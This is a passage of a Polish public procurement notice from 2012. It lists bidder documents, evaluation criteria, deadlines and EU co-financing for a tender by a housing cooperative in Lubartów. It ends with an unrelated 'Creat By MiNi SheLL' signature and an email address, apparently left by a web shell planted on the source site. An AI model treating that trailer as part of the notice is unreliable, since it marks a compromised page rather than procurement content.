10. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia z postępowania w postaci otwarcia wobec  wykonawcy likwidacji lub ogłoszenia upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie, iż brak jest podstaw do wykluczenia wykonawcy, o których mowa w niniejszym punkcie z wykorzystaniem wzoru zał. nr 8.
11. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.
12. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Udzielona gwarancja na roboty objęte zamówieniem - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smlubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21-100 Lubartów, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2012 godzina 11:00, miejsce: Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21-100 Lubartów, pokój Sekretariatu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w Ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com